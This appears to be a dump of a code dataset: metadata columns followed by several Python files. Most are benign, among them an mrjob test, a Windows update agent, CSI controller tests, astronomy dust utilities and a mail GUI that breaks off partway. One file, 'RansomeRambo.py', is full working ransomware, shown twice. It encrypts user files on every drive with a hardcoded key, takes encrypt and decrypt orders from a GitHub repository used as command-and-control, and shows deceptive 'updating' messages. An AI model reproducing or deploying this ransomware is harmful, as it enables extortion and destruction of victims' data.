hexsha stringlengths 40 40 | size int64 7 1.04M | ext stringclasses 10 values | lang stringclasses 1 value | max_stars_repo_path stringlengths 4 247 | max_stars_repo_name stringlengths 4 125 | max_stars_repo_head_hexsha stringlengths 40 78 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 368k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 4 247 | max_issues_repo_name stringlengths 4 125 | max_issues_repo_head_hexsha stringlengths 40 78 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 116k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 4 247 | max_forks_repo_name stringlengths 4 125 | max_forks_repo_head_hexsha stringlengths 40 78 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 1 1.04M | avg_line_length float64 1.77 618k | max_line_length int64 1 1.02M | alphanum_fraction float64 0 1 | original_content stringlengths 7 1.04M | filtered:remove_function_no_docstring int64 -102 942k | filtered:remove_class_no_docstring int64 -354 977k | filtered:remove_delete_markers int64 0 60.1k |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
074a5f38b5f51641068bed34421d80734ffa302f | 1,275 | py | Python | tests/mr_verbose_job.py | mikiec84/mrjob | 801fffffdc6af860edd7813c948f9da341305b21 | [
"Apache-2.0"
] | 1,538 | 2015-01-02T10:22:17.000Z | 2022-03-29T16:42:33.000Z | tests/mr_verbose_job.py | mikiec84/mrjob | 801fffffdc6af860edd7813c948f9da341305b21 | [
"Apache-2.0"
] | 1,027 | 2015-01-09T21:30:37.000Z | 2022-02-26T18:21:42.000Z | tests/mr_verbose_job.py | mikiec84/mrjob | 801fffffdc6af860edd7813c948f9da341305b21 | [
"Apache-2.0"
] | 403 | 2015-01-06T15:49:44.000Z | 2022-03-29T16:42:34.000Z | # Copyright 2009-2012 Yelp and Contributors
# Copyright 2014 Ed Schofield
# Copyright 2015 Yelp
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""We use this to test jobs that emit a large amount of stderr."""
from __future__ import print_function
import sys
from mrjob.job import MRJob
if __name__ == '__main__':
MRVerboseJob.run()
| 30.357143 | 74 | 0.70902 | # Copyright 2009-2012 Yelp and Contributors
# Copyright 2014 Ed Schofield
# Copyright 2015 Yelp
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""We use this to test jobs that emit a large amount of stderr."""
from __future__ import print_function
import sys
from mrjob.job import MRJob
class MRVerboseJob(MRJob):
def mapper_final(self):
# the UNIX pipe buffer can hold 65536 bytes, so this should
# definitely exceed that
for i in range(10000):
self.increment_counter('Foo', 'Bar')
for i in range(100):
self.set_status(str(i))
print('Qux', file=sys.stderr)
# raise an exception so we can test stacktrace finding
raise Exception('BOOM')
if __name__ == '__main__':
MRVerboseJob.run()
| 384 | 5 | 50 |
10efc1718f9d54c6796e3b72ec3fa022df3faae4 | 3,602 | py | Python | winagent/winupdater.py | wh1te909/winagent | 14c1bf658b8eaafb160e5c0d4094b2cd580739f3 | [
"MIT"
] | 14 | 2019-10-22T22:56:51.000Z | 2022-02-22T23:43:43.000Z | winagent/winupdater.py | wh1te909/winagent | 14c1bf658b8eaafb160e5c0d4094b2cd580739f3 | [
"MIT"
] | 3 | 2020-08-13T18:36:02.000Z | 2020-09-30T06:25:04.000Z | winagent/winupdater.py | wh1te909/winagent | 14c1bf658b8eaafb160e5c0d4094b2cd580739f3 | [
"MIT"
] | 10 | 2020-04-01T01:56:14.000Z | 2021-04-27T09:23:51.000Z | import json
import subprocess
import requests
from agent import WindowsAgent
| 34.634615 | 106 | 0.429761 | import json
import subprocess
import requests
from agent import WindowsAgent
class WinUpdater(WindowsAgent):
def __init__(self, log_level, log_to):
super().__init__(log_level, log_to)
self.updater_url = f"{self.astor.server}/winupdate/winupdater/"
self.results_url = f"{self.astor.server}/winupdate/results/"
self.scan_url = f"{self.astor.server}/api/v1/triggerpatchscan/"
self.check_payload = {"agent_id": self.astor.agentid}
def install_update(self, kb):
try:
r = subprocess.run(
[
self.salt_call,
"win_wua.get",
f"{kb}",
"download=True",
"install=True",
"--local",
],
capture_output=True,
timeout=7200,
)
ret = r.stdout.decode("utf-8", errors="ignore")
self.logger.debug(ret)
return ret
except Exception as e:
self.logger.debug(e)
def trigger_patch_scan(self):
try:
payload = {
"agent_id": self.astor.agentid,
"reboot": self.salt_call_ret_bool("win_wua.get_needs_reboot"),
}
r = requests.patch(
self.scan_url,
data=json.dumps(payload),
headers=self.headers,
timeout=60,
verify=self.verify,
)
except Exception as e:
self.logger.debug(e)
return False
return "ok"
def install_all(self):
try:
resp = requests.get(
self.updater_url,
data=json.dumps(self.check_payload),
headers=self.headers,
timeout=30,
verify=self.verify,
)
except Exception as e:
self.logger.debug(e)
return False
else:
if resp.json() == "nopatches":
return False
else:
try:
for patch in resp.json():
kb = patch["kb"]
install = self.install_update(kb)
self.logger.info(install)
res_payload = {"agent_id": self.astor.agentid, "kb": kb}
status = json.loads(install)
if (
status["local"]["Install"]["Updates"]
== "Nothing to install"
):
res_payload.update({"results": "alreadyinstalled"})
else:
if status["local"]["Install"]["Success"]:
res_payload.update({"results": "success"})
else:
res_payload.update({"results": "failed"})
requests.patch(
self.results_url,
json.dumps(res_payload),
headers=self.headers,
timeout=30,
verify=self.verify,
)
# trigger a patch scan once all updates finish installing, and check if reboot needed
self.trigger_patch_scan()
except Exception as e:
self.logger.debug(e)
| 3,366 | 10 | 139 |
ff3ce84693032b7db794d048169346347ad09d7e | 5,946 | py | Python | RansomeRambo.py | ashfaquekhan/RansomeRambo | bd91f6f6044a7c51730962416adaa83ff7176541 | [
"MIT"
] | null | null | null | RansomeRambo.py | ashfaquekhan/RansomeRambo | bd91f6f6044a7c51730962416adaa83ff7176541 | [
"MIT"
] | null | null | null | RansomeRambo.py | ashfaquekhan/RansomeRambo | bd91f6f6044a7c51730962416adaa83ff7176541 | [
"MIT"
] | 1 | 2021-03-19T07:06:57.000Z | 2021-03-19T07:06:57.000Z | import os
from cryptography import fernet
from cryptography.fernet import Fernet
from binascii import Error
import string
from ctypes import windll
from glob import glob
from github import Github
from uuid import getnode as get_mac
from os import path
import sys
k="_________________________YOUR_KEY_________________________"
global tDirs
global tFiles
print('''
____ ____ _ / \__
| _ \ __ _ _ __ ___ ___ _ __ ___ ___ | _ \ __ _ _ __ ___ | |__ ___ ( @\___
| |_) / _` | '_ \/ __|/ _ \| '_ ` _ \ / _ \ | |_) / _` | '_ ` _ \| '_ \ / _ \ / O
| _ < (_| | | | \__ \ (_) | | | | | | __/ | _ < (_| | | | | | | |_) | (_) | / (_____/
|_| \_\__,_|_| |_|___/\___/|_| |_| |_|\___| |_| \_\__,_|_| |_| |_|_.__/ \___/ /_____/ ''')
if __name__ == '__main__':
lis = get_drives()
try:
data=get_hub()
if data == " ":
git_up("NEW_ENTRY","NULL")
elif "ENCRYPT" in data:
for l in lis:
scan_e(l+":\\")
git_up("SUCCESSFULL","FULLY_E_N_CRYPTED")
elif "DECRYPT" in data:
for l in lis:
scan_d(l+":\\")
git_up("SUCCESSFULL","FULLY_D_E_CRYPTED")
except:
release_issue()
data=get_hub()
pass
| 38.36129 | 91 | 0.581399 | import os
from cryptography import fernet
from cryptography.fernet import Fernet
from binascii import Error
import string
from ctypes import windll
from glob import glob
from github import Github
from uuid import getnode as get_mac
from os import path
import sys
k="_________________________YOUR_KEY_________________________"
global tDirs
global tFiles
print('''
____ ____ _ / \__
| _ \ __ _ _ __ ___ ___ _ __ ___ ___ | _ \ __ _ _ __ ___ | |__ ___ ( @\___
| |_) / _` | '_ \/ __|/ _ \| '_ ` _ \ / _ \ | |_) / _` | '_ ` _ \| '_ \ / _ \ / O
| _ < (_| | | | \__ \ (_) | | | | | | __/ | _ < (_| | | | | | | |_) | (_) | / (_____/
|_| \_\__,_|_| |_|___/\___/|_| |_| |_|\___| |_| \_\__,_|_| |_| |_|_.__/ \___/ /_____/ ''')
def encrypt(filename, key):
f = Fernet(key)
with open(filename, "rb") as file:
file_data = file.read()
encrypted_data = f.encrypt(file_data)
with open(filename, "wb") as file:
file.write(encrypted_data)
def decrypt(filename, key):
f = Fernet(key)
with open(filename, "rb") as file:
encrypted_data = file.read()
decrypted_data = f.decrypt(encrypted_data)
with open(filename, "wb") as file:
file.write(decrypted_data)
def release_issue():
g = Github("________GITHUB-USERNAME________", "________GITHUB-AUTH-TOKEN________")
repo=g.get_user().get_repo("________REPOSITORY-NAME________")
mac = get_mac()
repo.create_file(str(mac)+".txt", "FILE_CREATED", "")
def fileInRepo(repo, path_to_file):
dir_path = os.path.dirname(path_to_file)
rsub = repo.head.commit.tree
path_elements = dir_path.split(os.path.sep)
for el_id, element in enumerate(path_elements):
sub_path = os.path.join(*path_elements[:el_id + 1])
if sub_path in rsub:
rsub = rsub[element]
else:
return False
return path_to_file in rsub
def git_up(msg,content):
g = Github("________GITHUB-USERNAME________", "________GITHUB-AUTH-TOKEN________")
repo=g.get_user().get_repo("________REPOSITORY-NAME________")
mac=get_mac()
file = repo.get_contents(str(mac)+".txt")
repo.update_file(str(mac)+".txt", msg, content, file.sha)
def get_hub():
github = Github("________GITHUB-USERNAME________", "________GITHUB-AUTH-TOKEN________")
user = github.get_user()
repository = user.get_repo("________REPOSITORY-NAME________")
mac= get_mac()
file_content = repository.get_contents(str(mac)+".txt")
chek = file_content.decoded_content.decode()
return chek
def get_drives():
drives = []
bitmask = windll.kernel32.GetLogicalDrives()
for letter in string.ascii_uppercase:
if bitmask & 1:
drives.append(letter)
bitmask >>= 1
return drives
def scan_d(APP_FOLDER):
tDirs=0
tFiles=0
lenl= os.listdir(APP_FOLDER)
lenl=len(lenl)
for base, dirs, files in os.walk(APP_FOLDER):
sys.stdout.write('\rDebugging Your PC [|U P D A T I N G ]')
sys.stdout.write('\rDebugging Your PC [ U|P D A T I N G ]')
sys.stdout.write('\rDebugging Your PC [ U P|D A T I N G ]')
sys.stdout.write('\rDebugging Your PC [ U P D|A T I N G ]')
sys.stdout.write('\rDebugging Your PC [ U P D A|T I N G ]')
sys.stdout.write('\rDebugging Your PC [ U P D A T|I N G ]')
sys.stdout.write('\rDebugging Your PC [ U P D A T I|N G ]')
sys.stdout.write('\rDebugging Your PC [ U P D A T I N|G ]')
sys.stdout.write('\rDebugging Your PC [ U P D A T I N G|]')
for directories in dirs:
tDirs += 1
for Files in files:
tFiles += 1
if Files.endswith(('.png','.jpg','.txt','.mp4','.jpeg','.pdf','.docx')):
try:
os.chdir(base)
decrypt(os.path.abspath(Files),k)
except(fernet.InvalidToken, TypeError, Error,PermissionError,OSError):
continue
sys.stdout.write('\r[ U P D A T E D ]')
def scan_e(APP_FOLDER):
tDirs=0
tFiles=0
for base, dirs, files in os.walk(APP_FOLDER):
sys.stdout.write('\rClosing The Window Might Harm Your PC [|U P D A T I N G ]')
sys.stdout.write('\rClosing The Window Might Harm Your PC [ U|P D A T I N G ]')
sys.stdout.write('\rClosing The Window Might Harm Your PC [ U P|D A T I N G ]')
sys.stdout.write('\rClosing The Window Might Harm Your PC [ U P D|A T I N G ]')
sys.stdout.write('\rClosing The Window Might Harm Your PC [ U P D A|T I N G ]')
sys.stdout.write('\rClosing The Window Might Harm Your PC [ U P D A T|I N G ]')
sys.stdout.write('\rClosing The Window Might Harm Your PC [ U P D A T I|N G ]')
sys.stdout.write('\rClosing The Window Might Harm Your PC [ U P D A T I N|G ]')
sys.stdout.write('\rClosing The Window Might Harm Your PC [ U P D A T I N G|]')
for directories in dirs:
tDirs+=1
for Files in files:
tFiles+=1
if Files.endswith(('.png','.jpg','.txt','.mp4','.jpeg','.pdf','.docx')):
try:
os.chdir(base)
encrypt(os.path.abspath(Files),k)
except(fernet.InvalidToken, TypeError, Error,PermissionError,OSError):
continue
sys.stdout.write('\r[ U P D A T E D ]')
if __name__ == '__main__':
lis = get_drives()
try:
data=get_hub()
if data == " ":
git_up("NEW_ENTRY","NULL")
elif "ENCRYPT" in data:
for l in lis:
scan_e(l+":\\")
git_up("SUCCESSFULL","FULLY_E_N_CRYPTED")
elif "DECRYPT" in data:
for l in lis:
scan_d(l+":\\")
git_up("SUCCESSFULL","FULLY_D_E_CRYPTED")
except:
release_issue()
data=get_hub()
pass
| 4,405 | 0 | 209 |
ce7b861febb5ee8d59fd437d679cae5012bc6f16 | 4,609 | py | Python | tests/bdd/features/csi/controller/test_identity.py | Abhinandan-Purkait/mayastor-control-plane | 73390a0e61dd93d1fb7c2735ebac579b7bb88434 | [
"Apache-2.0"
] | 2 | 2022-01-05T06:55:02.000Z | 2022-01-13T22:02:37.000Z | tests/bdd/features/csi/controller/test_identity.py | Abhinandan-Purkait/mayastor-control-plane | 73390a0e61dd93d1fb7c2735ebac579b7bb88434 | [
"Apache-2.0"
] | 67 | 2021-10-04T08:12:11.000Z | 2022-01-19T16:59:10.000Z | tests/bdd/features/csi/controller/test_identity.py | Abhinandan-Purkait/mayastor-control-plane | 73390a0e61dd93d1fb7c2735ebac579b7bb88434 | [
"Apache-2.0"
] | 5 | 2021-11-18T10:36:23.000Z | 2022-01-14T20:51:51.000Z | """CSI Controller Identity RPC tests."""
from pytest_bdd import (
given,
scenario,
then,
when,
)
import pytest
import docker
import subprocess
import csi_pb2 as pb
from common.csi import CsiHandle
from common.deployer import Deployer
from common.apiclient import ApiClient
@pytest.fixture(scope="module")
@scenario("identity.feature", "get plugin information")
def test_plugin_info(setup):
"""get plugin information"""
@scenario("identity.feature", "get plugin capabilities")
def test_plugin_capabilities(setup):
"""get plugin capabilities"""
@scenario(
"identity.feature",
"probe CSI controller when REST API endpoint is accessible",
)
def test_probe_rest_accessible(setup):
"""probe when REST is accessible"""
@scenario(
"identity.feature",
"probe CSI controller when REST API endpoint is not accessible",
)
def test_probe_rest_not_accessible(setup):
"""probe when REST is not accessible"""
@given("a running CSI controller plugin", target_fixture="csi_instance")
@given(
"a running CSI controller plugin with accessible REST API endpoint",
target_fixture="csi_plugin",
)
@pytest.fixture(scope="function")
@given(
"a running CSI controller plugin without REST API server running",
target_fixture="csi_plugin_partial",
)
@when(
"a GetPluginInfo request is sent to CSI controller", target_fixture="info_request"
)
@then("CSI controller should report its name and version")
@when(
"a GetPluginCapabilities request is sent to CSI controller",
target_fixture="caps_request",
)
@then("CSI controller should report its capabilities")
@when("a Probe request is sent to CSI controller", target_fixture="probe_available")
@when(
"a Probe request is sent to CSI controller which can not access REST API endpoint",
target_fixture="probe_not_available",
)
@then("CSI controller should report itself as being ready")
@then("CSI controller should report itself as being ready")
@then("CSI controller should report itself as being not ready")
| 27.76506 | 88 | 0.740291 | """CSI Controller Identity RPC tests."""
from pytest_bdd import (
given,
scenario,
then,
when,
)
import pytest
import docker
import subprocess
import csi_pb2 as pb
from common.csi import CsiHandle
from common.deployer import Deployer
from common.apiclient import ApiClient
@pytest.fixture(scope="module")
def setup():
Deployer.start(1, csi=True)
subprocess.run(["sudo", "chmod", "go+rw", "/var/tmp/csi.sock"], check=True)
yield
Deployer.stop()
@scenario("identity.feature", "get plugin information")
def test_plugin_info(setup):
"""get plugin information"""
@scenario("identity.feature", "get plugin capabilities")
def test_plugin_capabilities(setup):
"""get plugin capabilities"""
@scenario(
"identity.feature",
"probe CSI controller when REST API endpoint is accessible",
)
def test_probe_rest_accessible(setup):
"""probe when REST is accessible"""
@scenario(
"identity.feature",
"probe CSI controller when REST API endpoint is not accessible",
)
def test_probe_rest_not_accessible(setup):
"""probe when REST is not accessible"""
def csi_rpc_handle():
return CsiHandle("unix:///var/tmp/csi.sock")
@given("a running CSI controller plugin", target_fixture="csi_instance")
def a_csi_plugin():
return csi_rpc_handle()
@given(
"a running CSI controller plugin with accessible REST API endpoint",
target_fixture="csi_plugin",
)
def csi_plugin_and_rest_api():
# Check REST APi accessibility by listing pools.
ApiClient.pools_api().get_pools()
return csi_rpc_handle()
@pytest.fixture(scope="function")
def stop_start_rest():
docker_client = docker.from_env()
try:
rest_server = docker_client.containers.list(all=True, filters={"name": "rest"})[
0
]
except docker.errors.NotFound:
raise Exception("No REST server instance found")
rest_server.stop()
yield
rest_server.start()
@given(
"a running CSI controller plugin without REST API server running",
target_fixture="csi_plugin_partial",
)
def csi_plugin_without_rest_api(stop_start_rest):
# Make sure REST API is not accessible anymore.
with pytest.raises(Exception) as e:
ApiClient.pools_api().get_pools()
return csi_rpc_handle()
@when(
"a GetPluginInfo request is sent to CSI controller", target_fixture="info_request"
)
def plugin_information_info_request(csi_instance):
return csi_instance.identity.GetPluginInfo(pb.GetPluginInfoRequest())
@then("CSI controller should report its name and version")
def check_csi_controller_info(info_request):
assert info_request.name == "io.openebs.csi-mayastor"
assert info_request.vendor_version == "1.0.0"
@when(
"a GetPluginCapabilities request is sent to CSI controller",
target_fixture="caps_request",
)
def plugin_information_info_request(csi_instance):
return csi_instance.identity.GetPluginCapabilities(
pb.GetPluginCapabilitiesRequest()
)
@then("CSI controller should report its capabilities")
def check_csi_controller_info(caps_request):
all_capabilities = [
pb.PluginCapability.Service.Type.CONTROLLER_SERVICE,
pb.PluginCapability.Service.Type.VOLUME_ACCESSIBILITY_CONSTRAINTS,
]
assert len(caps_request.capabilities) == len(
all_capabilities
), "Wrong amount of plugin capabilities reported"
for c in caps_request.capabilities:
ct = c.service.type
assert ct in all_capabilities, "Unexpected capability reported: %s" % str(ct)
@when("a Probe request is sent to CSI controller", target_fixture="probe_available")
def probe_request_api_accessible(csi_plugin):
return csi_plugin.identity.Probe(pb.ProbeRequest())
@when(
"a Probe request is sent to CSI controller which can not access REST API endpoint",
target_fixture="probe_not_available",
)
def probe_request_api_not_accessible(csi_plugin_partial):
return csi_plugin_partial.identity.Probe(pb.ProbeRequest())
@then("CSI controller should report itself as being ready")
def check_probe_api_accessible(probe_available):
assert probe_available.ready.value, "CSI Plugin is not ready"
@then("CSI controller should report itself as being ready")
def check_probe_request_api_accessible(probe_available):
assert probe_available.ready.value, "CSI Plugin is not ready"
@then("CSI controller should report itself as being not ready")
def check_probe_request_api_not_accessible(probe_not_available):
assert (
probe_not_available.ready.value == False
), "CSI controller is ready when REST server is not reachable"
| 2,226 | 0 | 331 |
bf266ca003e5fba0c3b0b9fc1b7a8535de42864b | 13 | py | Python | openml_data_integration/protobuf_generator/openml_61/myconstants.py | tuix/tutorials | 733d35a8a39df079e8c2432c441b70785ab08440 | [
"Apache-2.0"
] | 8 | 2020-04-21T13:29:04.000Z | 2021-12-13T08:59:09.000Z | openml_data_integration/protobuf_generator/openml_61/myconstants.py | tuix/tutorials | 733d35a8a39df079e8c2432c441b70785ab08440 | [
"Apache-2.0"
] | 3 | 2021-04-27T11:03:04.000Z | 2021-05-24T18:22:57.000Z | openml_data_integration/protobuf_generator/openml_61/myconstants.py | tuix/tutorials | 733d35a8a39df079e8c2432c441b70785ab08440 | [
"Apache-2.0"
] | 6 | 2020-07-06T08:23:25.000Z | 2021-11-24T10:39:34.000Z | DATA_ID = 61
| 6.5 | 12 | 0.692308 | DATA_ID = 61
| 0 | 0 | 0 |
a57f096969ac9ee95489c6e8b7567700ba86d2eb | 102 | py | Python | models/control_agent.py | KevinJeon/The-Tragedy-of-the-commons | 7151faf25fd91732de19a843b39cd1f2614f34ca | [
"Apache-2.0"
] | 5 | 2021-03-21T15:04:36.000Z | 2021-06-22T14:09:00.000Z | models/control_agent.py | KevinJeon/The-Tragedy-of-the-commons | 7151faf25fd91732de19a843b39cd1f2614f34ca | [
"Apache-2.0"
] | 5 | 2021-04-10T08:16:16.000Z | 2021-09-12T09:28:42.000Z | models/control_agent.py | KevinJeon/The-Tragedy-of-the-commons | 7151faf25fd91732de19a843b39cd1f2614f34ca | [
"Apache-2.0"
] | 2 | 2021-04-26T22:33:19.000Z | 2021-06-08T18:13:49.000Z | import torch.nn as nn
import torch as tr
| 10.2 | 23 | 0.666667 | import torch.nn as nn
import torch as tr
class ControlTower:
def __init__(self):
pass
| 11 | -2 | 50 |
ae524e05388437d5528605d101b38fa984ea9adb | 3,321 | py | Python | snsim/dust_utils.py | bcarreres/snsim | 86ffc49f254cd89c74be9c3350c00982e3d216e2 | [
"BSD-3-Clause"
] | 5 | 2021-07-14T18:23:59.000Z | 2022-02-02T13:09:55.000Z | snsim/dust_utils.py | bcarreres/snsim | 86ffc49f254cd89c74be9c3350c00982e3d216e2 | [
"BSD-3-Clause"
] | 7 | 2021-02-25T15:19:59.000Z | 2021-11-24T08:24:55.000Z | snsim/dust_utils.py | bcarreres/snsim | 86ffc49f254cd89c74be9c3350c00982e3d216e2 | [
"BSD-3-Clause"
] | 1 | 2021-05-19T11:25:18.000Z | 2021-05-19T11:25:18.000Z | """This module contains dust features."""
import os
import sncosmo as snc
import sfdmap
from snsim import __snsim_dir_path__
import glob
import requests
import tarfile
def check_files_and_dowload():
"""Check if sdfmap files are here and download if not.
Returns
-------
None
No return, just download files.
"""
files_in_dust_data = glob.glob(__snsim_dir_path__ + '/dust_data/*.fits')
files_list = ['SFD_dust_4096_ngp.fits', 'SFD_dust_4096_sgp.fits',
'SFD_mask_4096_ngp.fits', 'SFD_mask_4096_sgp.fits']
filenames = []
for file in files_in_dust_data:
filenames.append(os.path.basename(file))
for file in files_list:
if file not in filenames:
print("Dowloading sfdmap files from https://github.com/kbarbary/sfddata/")
url = "https://github.com/kbarbary/sfddata/archive/master.tar.gz"
response = requests.get(url, stream=True)
file = tarfile.open(fileobj=response.raw, mode="r|gz")
file.extractall(path=__snsim_dir_path__ + '/dust_data')
new_file = glob.glob(__snsim_dir_path__ + '/dust_data/sfddata-master/*.fits')
for nfile in new_file:
os.replace(nfile, __snsim_dir_path__ + '/dust_data/' + os.path.basename(nfile))
other_files = glob.glob(__snsim_dir_path__ + '/dust_data/sfddata-master/*')
for ofile in other_files:
os.remove(ofile)
os.rmdir(__snsim_dir_path__ + '/dust_data/sfddata-master')
break
def init_mw_dust(model, mw_dust):
"""Set MW dut effect on sncosmo model.
Parameters
----------
model : sncosmo.Model
The sncosmo model which to add the mw dust.
mw_dust_mod : dic
The model of dust to apply.
Returns
-------
None
Directly modify the sncosmo model.
"""
f99_r_v = 3.1
if 'rv' in mw_dust:
f99_r_v = mw_dust['rv']
if mw_dust['model'].lower() == 'ccm89':
dust = snc.CCM89Dust()
elif mw_dust['model'].lower() == 'od94':
dust = snc.OD94Dust()
elif mw_dust['model'].lower() == 'f99':
dust = snc.F99Dust(r_v=f99_r_v)
else:
raise ValueError(f"{mw_dust['model']} model does not exist in sncosmo")
model.add_effect(dust, frame='obs', name='mw_')
def add_mw_to_fit(fit_model, mwebv, mod_name, rv=3.1):
"""Set mw model parameters of a sncsomo model.
Parameters
----------
fit_model : type
Description of parameter `fit_model`.
mwebv : float
E(B-V) color excess of the sn.
rv : float
R_v coeff of the MW.
Returns
-------
None
Directly modify the sncosmo model.
"""
if 'mw_' in fit_model.effect_names:
fit_model.set(mw_ebv=mwebv)
if mod_name .lower() not in ['f99']:
fit_model.set(mw_r_v=rv)
def compute_ebv(ra, dec):
"""Compute E(B-V) color excess.
Parameters
----------
ra : float or numpy.ndarray
Right Ascension.
dec : float or numpy.ndarray
Declinaison.
Returns
-------
float or numpy.ndarray
The color excess correponding to ra, dec coordinates.
"""
map = sfdmap.SFDMap(__snsim_dir_path__ + '/dust_data')
ebv = map.ebv(ra, dec, unit='radian')
return ebv
| 28.144068 | 95 | 0.613972 | """This module contains dust features."""
import os
import sncosmo as snc
import sfdmap
from snsim import __snsim_dir_path__
import glob
import requests
import tarfile
def check_files_and_dowload():
"""Check if sdfmap files are here and download if not.
Returns
-------
None
No return, just download files.
"""
files_in_dust_data = glob.glob(__snsim_dir_path__ + '/dust_data/*.fits')
files_list = ['SFD_dust_4096_ngp.fits', 'SFD_dust_4096_sgp.fits',
'SFD_mask_4096_ngp.fits', 'SFD_mask_4096_sgp.fits']
filenames = []
for file in files_in_dust_data:
filenames.append(os.path.basename(file))
for file in files_list:
if file not in filenames:
print("Dowloading sfdmap files from https://github.com/kbarbary/sfddata/")
url = "https://github.com/kbarbary/sfddata/archive/master.tar.gz"
response = requests.get(url, stream=True)
file = tarfile.open(fileobj=response.raw, mode="r|gz")
file.extractall(path=__snsim_dir_path__ + '/dust_data')
new_file = glob.glob(__snsim_dir_path__ + '/dust_data/sfddata-master/*.fits')
for nfile in new_file:
os.replace(nfile, __snsim_dir_path__ + '/dust_data/' + os.path.basename(nfile))
other_files = glob.glob(__snsim_dir_path__ + '/dust_data/sfddata-master/*')
for ofile in other_files:
os.remove(ofile)
os.rmdir(__snsim_dir_path__ + '/dust_data/sfddata-master')
break
def init_mw_dust(model, mw_dust):
"""Set MW dut effect on sncosmo model.
Parameters
----------
model : sncosmo.Model
The sncosmo model which to add the mw dust.
mw_dust_mod : dic
The model of dust to apply.
Returns
-------
None
Directly modify the sncosmo model.
"""
f99_r_v = 3.1
if 'rv' in mw_dust:
f99_r_v = mw_dust['rv']
if mw_dust['model'].lower() == 'ccm89':
dust = snc.CCM89Dust()
elif mw_dust['model'].lower() == 'od94':
dust = snc.OD94Dust()
elif mw_dust['model'].lower() == 'f99':
dust = snc.F99Dust(r_v=f99_r_v)
else:
raise ValueError(f"{mw_dust['model']} model does not exist in sncosmo")
model.add_effect(dust, frame='obs', name='mw_')
def add_mw_to_fit(fit_model, mwebv, mod_name, rv=3.1):
"""Set mw model parameters of a sncsomo model.
Parameters
----------
fit_model : type
Description of parameter `fit_model`.
mwebv : float
E(B-V) color excess of the sn.
rv : float
R_v coeff of the MW.
Returns
-------
None
Directly modify the sncosmo model.
"""
if 'mw_' in fit_model.effect_names:
fit_model.set(mw_ebv=mwebv)
if mod_name .lower() not in ['f99']:
fit_model.set(mw_r_v=rv)
def compute_ebv(ra, dec):
"""Compute E(B-V) color excess.
Parameters
----------
ra : float or numpy.ndarray
Right Ascension.
dec : float or numpy.ndarray
Declinaison.
Returns
-------
float or numpy.ndarray
The color excess correponding to ra, dec coordinates.
"""
map = sfdmap.SFDMap(__snsim_dir_path__ + '/dust_data')
ebv = map.ebv(ra, dec, unit='radian')
return ebv
| 0 | 0 | 0 |
5a81acb80f3e5af524b468d8e34e3dbfea839359 | 67 | py | Python | yun/batch/__init__.py | NbKevin/ArduinoYunAPI | 9f928cb9b7b99c19a2f255c6194f5a3ff7a06732 | [
"Apache-2.0"
] | null | null | null | yun/batch/__init__.py | NbKevin/ArduinoYunAPI | 9f928cb9b7b99c19a2f255c6194f5a3ff7a06732 | [
"Apache-2.0"
] | null | null | null | yun/batch/__init__.py | NbKevin/ArduinoYunAPI | 9f928cb9b7b99c19a2f255c6194f5a3ff7a06732 | [
"Apache-2.0"
] | null | null | null | #!/usr/env/bin python
# -*- encoding: utf-8 -*-
__author__ = 'Nb'
| 13.4 | 25 | 0.58209 | #!/usr/env/bin python
# -*- encoding: utf-8 -*-
__author__ = 'Nb'
| 0 | 0 | 0 |
39c723183c5ba9cbd0b76ee6b6fd2c3a10c44e46 | 4,731 | py | Python | bytemailgui.py | Max00355/ByteMail-1 | 576f765da9fb88f23b4d5c46868e0ce16db83c7c | [
"MIT"
] | 4 | 2016-02-18T15:11:58.000Z | 2020-01-16T11:07:50.000Z | bytemailgui.py | Max00355/ByteMail-1 | 576f765da9fb88f23b4d5c46868e0ce16db83c7c | [
"MIT"
] | 1 | 2021-03-06T00:07:14.000Z | 2021-03-06T00:15:26.000Z | bytemailgui.py | Max00355/ByteMail-1 | 576f765da9fb88f23b4d5c46868e0ce16db83c7c | [
"MIT"
] | 1 | 2017-11-08T04:33:38.000Z | 2017-11-08T04:33:38.000Z | from flask import Flask, redirect, render_template, request
import db
import message
import random
import read
import delete
import addressbook
import sent as sent_
app = Flask(__name__)
@app.route("/", methods=['GET', 'POST'])
@app.route("/sent/", methods=['GET', 'POST'])
@app.route("/read/<id>")
@app.route("/addressbook/", methods=['GET', 'POST'])
@app.route("/reply/<to>/<title>/", methods=['GET', 'POST'])
@app.route("/send/", methods=['GET', 'POST'])
if __name__ == "__main__":
app.run(debug=True, port=5044)
| 31.331126 | 154 | 0.535193 | from flask import Flask, redirect, render_template, request
import db
import message
import random
import read
import delete
import addressbook
import sent as sent_
app = Flask(__name__)
def check():
while True:
try:
c = db.messages.find("messages", "all")
break
except:
continue
messages = []
for x in c:
if 'to' in x:
if x['to'] == addr:
messages.append(x)
return messages
@app.route("/", methods=['GET', 'POST'])
def index():
if request.method == 'POST':
for x in request.form.getlist("delete"):
delete_(x.replace("/", ''))
message = check()
message.reverse()
return render_template("index.html", messages=message, num=str(len(message)), addr=addr)
def empty_sent(id):
sent_.sent_delete(id)
@app.route("/sent/", methods=['GET', 'POST'])
def sent():
try:
if request.method == 'POST':
for x in request.form.getlist("delete"):
